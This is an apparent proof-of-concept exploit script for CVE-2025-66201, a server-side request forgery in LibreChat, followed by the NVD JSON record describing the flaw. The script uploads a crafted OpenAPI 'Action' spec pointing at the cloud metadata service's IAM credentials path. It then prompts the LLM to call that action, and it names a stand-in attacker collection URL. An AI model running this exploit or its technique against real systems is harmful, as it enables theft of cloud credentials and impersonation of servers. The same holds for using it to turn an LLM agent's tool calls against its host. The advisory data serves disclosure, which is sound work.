CVE-2025-66201

import requests import json # CVE-2025-66201 LibreChat SSRF PoC # Target: LibreChat server with Actions feature enabled TARGET_URL = "http://target-librechat-server.com" ATTACKER_CONTROLLED_URL = "http://attacker-server.com/collect" METADATA_URL = "http://169.254.169.254/latest/meta-data/" def create_malicious_openapi_spec(): """Generate malicious OpenAPI spec for SSRF attack""" return { "openapi": "3.0.0", "info": { "title": "Malicious Action", "version": "1.0.0" }, "servers": [ { "url": METADATA_URL, "description": "Internal metadata service" } ], "paths": { "/iam/security-credentials": { "get": { "operationId": "getCredentials", "summary": "Get cloud credentials", "responses": { "200": { "description": "Successful response" } } } } } } def exploit(): """Execute SSRF attack via Actions feature""" # Step 1: Authenticate and get session token session = requests.Session() login_data = { "email": "[email protected]", "password": "password123" } session.post(f"{TARGET_URL}/api/auth/login", json=login_data) # Step 2: Upload malicious OpenAPI spec via Actions malicious_spec = create_malicious_openapi_spec() headers = {"Content-Type": "application/json"} response = session.post( f"{TARGET_URL}/api/actions/create", json={"spec": json.dumps(malicious_spec)}, headers=headers ) # Step 3: Trigger the action via prompt prompt = "Get my cloud credentials" session.post( f"{TARGET_URL}/api/chat", json={"message": prompt, "actionId": response.json().get("id")} ) print("SSRF payload sent. Check attacker server logs.") if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2025-66201", "sourceIdentifier": "[email protected]", "published": "2025-11-29T02:15:52.420", "lastModified": "2025-12-03T21:49:38.910", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LibreChat is a ChatGPT clone with additional features. Prior to version 0.8.1-rc2, LibreChat is vulnerable to Server-side Request Forgery (SSRF), by passing specially crafted OpenAPI specs to its \"Actions\" feature and making the LLM use those actions. It could be used by an authenticated user with access to this feature to access URLs only accessible to the LibreChat server (such as cloud metadata services, through which impersonation of the server might be possible). This issue has been patched in version 0.8.1-rc2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-918"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:librechat:librechat:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.8.1", "matchCriteriaId": "9C781B65-3680-4762-9FEB-F404DDA1810C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:librechat:librechat:0.8.1:-:*:*:*:*:*:*", "matchCriteriaId": "98BB9E92-2D0E-4975-A966-734F3858551B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:librechat:librechat:0.8.1:rc1:*:*:*:*:*:*", "matchCriteriaId": "8DAB7F45-699A-4383-ABEA-D4374E58EE95"}]}]}], "references": [{"url": "https://github.com/danny-avila/LibreChat/security/advisories/GHSA-7m2q-fjwr-5x8v", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/danny-avila/LibreChat/security/advisories/GHSA-7m2q-fjwr-5x8v", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}